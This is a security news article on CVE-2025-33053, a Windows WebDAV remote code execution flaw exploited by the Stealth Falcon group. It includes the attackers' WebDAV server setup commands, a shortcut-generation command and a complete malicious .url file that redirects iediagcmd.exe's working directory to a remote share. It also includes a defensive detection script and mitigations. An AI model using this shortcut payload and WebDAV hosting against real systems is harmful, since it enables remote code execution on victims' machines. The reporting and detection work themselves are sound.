
WebDAV Remote Code Execution 0-Day Actively Exploited — PoC Released

A critical zero-day vulnerability in Microsoft’s Web Distributed Authoring and Versioning (WebDAV) protocol, tracked as CVE-2025-33053, has been actively exploited by the advanced persistent threat (APT) group Stealth Falcon since March 2025.

The flaw, patched in June’s Patch Tuesday, enables remote code execution (RCE) via manipulated .url shortcut files and has been linked to attacks against Middle Eastern defense sectors.

Vulnerability Overview

According to the report, CVE-2025-33053 (CVSS 8.8) allows attackers to hijack the working directory of legitimate Windows tools like iediagcmd.exe, forcing them to execute malicious payloads from attacker-controlled WebDAV servers.

Key details:

| Component         | Details |
|-------------------|---------|
| Affected Systems  | Windows 10/11, Server 2016–2025, and legacy unsupported versions |
| Exploit Mechanism | Abuse of WebDAV’s UNC path handling to redirect WorkingDirectory |
| Initial Vector    | Phishing emails with .url files masquerading as PDFs |
| Primary Payload   | Horus Agent (Mythic framework-based implant with anti-analysis techniques) |

Technical Breakdown of the Exploit

The attack chain leverages a multi-stage process:

1. WebDAV Server Deployment

Attackers use scripts like setup_webdav.sh to configure Apache2 servers with WebDAV modules:

```bash
# Apache WebDAV configuration snippet (run as root: the >> redirection below writes to /etc)
sudo a2enmod dav
sudo a2enmod dav_fs
mkdir /var/www/webdav
chown -R www-data:www-data /var/www/webdav
# printf rather than echo: plain echo writes the literal characters "\n" into the config file
printf '<Directory /var/www/webdav>\nDAV On\n</Directory>\n' >> /etc/apache2/sites-available/000-default.conf
systemctl restart apache2
```

This creates a WebDAV endpoint at http://<attacker-ip>/webdav for hosting malicious executables.

2. Malicious .url File Generation

The gen_url.py script crafts .url files that abuse Windows’ file execution order:

```bash
# Example .url file generation command
python3 gen_url.py --ip 192.168.1.100 --exe "C:\Program Files\Internet Explorer\iediagcmd.exe" --out payload.url
```

Resulting in:

```text
[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\192.168.1.100\webdav\
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
```

When the shortcut is opened, iediagcmd.exe launches route.exe and resolves it from the attacker-supplied WebDAV working directory instead of from C:\Windows\System32.
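The defender-side counterpart of the pattern above is a check that looks for exactly this combination in an Internet Shortcut: a URL= field that names a local executable together with a WorkingDirectory= field that is a UNC path to a remote share. The following is an added example written for this article, not code from the report or from the Stealth Falcon tooling; it parses .url files (loose or inside a ZIP, the initial-access container described later) and flags the combination. The sample shortcut bodies and the ZIP contents are constructed for the demonstration; the function and constant names are the example's own.

```python
"""Flag Internet Shortcut (.url) files whose WorkingDirectory is redirected
to a UNC share while URL points at a local executable (the CVE-2025-33053
abuse pattern). Added example; not part of the original article."""
import configparser
import io
import ipaddress
import re
import zipfile

# \\host\share\...  -> capture the host portion
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")
# Absolute local path to an executable, e.g. C:\...\iediagcmd.exe
LOCAL_EXE_RE = re.compile(r"^[A-Za-z]:\\.+\.(exe|com|scr)$", re.IGNORECASE)


def parse_url_file(text):
    """Return the [InternetShortcut] section as a dict with lower-cased keys
    (.url files are INI-formatted); empty dict if the section is missing."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text.replace("\r\n", "\n"))
    if not cp.has_section("InternetShortcut"):
        return {}
    return dict(cp.items("InternetShortcut"))


def unc_host(path):
    """Host portion of a UNC path, or None when the path is not UNC."""
    m = UNC_RE.match(path.strip())
    return m.group(1) if m else None


def host_is_external(host):
    """True for globally routable IP addresses and for DNS names (the
    attacker controls their own DNS); RFC 1918, loopback and link-local
    addresses return False so lab-style internal hosts rank lower."""
    try:
        return ipaddress.ip_address(host).is_global
    except ValueError:
        return True


def analyze_shortcut(text):
    """Return a finding dict for one .url file body."""
    fields = parse_url_file(text)
    url = fields.get("url", "")
    workdir = fields.get("workingdirectory", "")
    host = unc_host(workdir)
    finding = {
        "url": url,
        "working_directory": workdir,
        "unc_host": host,
        "local_executable_target": bool(LOCAL_EXE_RE.match(url.strip())),
        "external_host": bool(host) and host_is_external(host),
    }
    # Core pattern: a local executable launched with its working directory
    # redirected to a remote share. A legitimate web shortcut has an
    # http(s) URL and no UNC working directory.
    finding["suspicious"] = finding["local_executable_target"] and host is not None
    return finding


def scan_zip(zip_bytes):
    """Analyze every .url entry inside a ZIP archive. Returns {name: finding}."""
    results = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            if name.lower().endswith(".url"):
                body = zf.read(name).decode("utf-8", "replace")
                results[name] = analyze_shortcut(body)
    return results


# Constructed samples (not campaign artifacts). The first mirrors the field
# layout shown above; the second is an ordinary web shortcut.
MALICIOUS_URL = (
    "[InternetShortcut]\r\n"
    "URL=C:\\Program Files\\Internet Explorer\\iediagcmd.exe\r\n"
    "WorkingDirectory=\\\\192.168.1.100\\webdav\\\r\n"
    "IconFile=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\r\n"
)
BENIGN_URL = "[InternetShortcut]\r\nURL=https://example.com/\r\n"


def build_sample_zip():
    """Constructed archive resembling a phishing attachment."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Invoice.pdf.url", MALICIOUS_URL)
        zf.writestr("readme.url", BENIGN_URL)
        zf.writestr("notes.txt", "nothing to see")
    return buf.getvalue()


if __name__ == "__main__":
    for name, f in scan_zip(build_sample_zip()).items():
        verdict = "SUSPICIOUS" if f["suspicious"] else "ok"
        print(f"{name}: {verdict} url={f['url']!r} workdir={f['working_directory']!r}")
```

The `external_host` field is deliberately separate from the `suspicious` verdict: the shortcut in the article points at a private address, which a check keyed only on "external IP" would miss, so the redirect itself is the trigger and the host classification only adjusts priority.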

Attack Chain and Payload Analysis

Stealth Falcon’s campaign follows a sophisticated workflow:

  1. Initial Access: Phishing email with a ZIP archive containing the malicious .url file.
  2. Exploitation: The .url file sets WorkingDirectory to a WebDAV path, triggering DLL hijacking or direct executable sideloading.
  3. Payload Delivery: Horus Loader (C++-based) decrypts a decoy PDF while injecting the Horus Agent into msedge.exe using NtResumeThread system calls.
  4. Persistence: The agent employs AES-encrypted C2 communication over HTTP, with HMAC-SHA256 integrity checks.

Anti-Analysis Techniques:

  • Process hollowing of legitimate binaries.
  • Manual mapping of kernel32.dll to evade API hooks.
  • Checks for 100+ antivirus processes across 17 vendors.

Mitigation and Response

Microsoft’s patch (KB5034553) modifies WebDAV’s handling of working directories. Organizations should:

  • Apply June 2025 Windows updates immediately.
  • Block .url files in email attachments via Group Policy.
  • Monitor for suspicious WebDAV connections (e.g., UNC paths of the form \\[external-IP]\webdav).

Legacy systems no longer receiving updates (e.g., Windows 7) remain vulnerable, necessitating network segmentation or WebDAV protocol blocking.

CVE-2025-33053 highlights the risks of deprecated protocols like WebDAV and the evolving tradecraft of APT groups.

By repurposing Windows utilities and leveraging living-off-the-land binaries (LOLBins), Stealth Falcon demonstrates how low-level protocol flaws can bypass modern defenses.

Continuous patch management and user awareness training remain critical in mitigating such threats.


Anupriya

Anupriya is a cybersecurity reporter at GBHackers On Security, specializing in cyber attacks, dark web monitoring, data breaches, vulnerabilities, and malware. She delivers in-depth analysis on emerging threats and digital security trends.
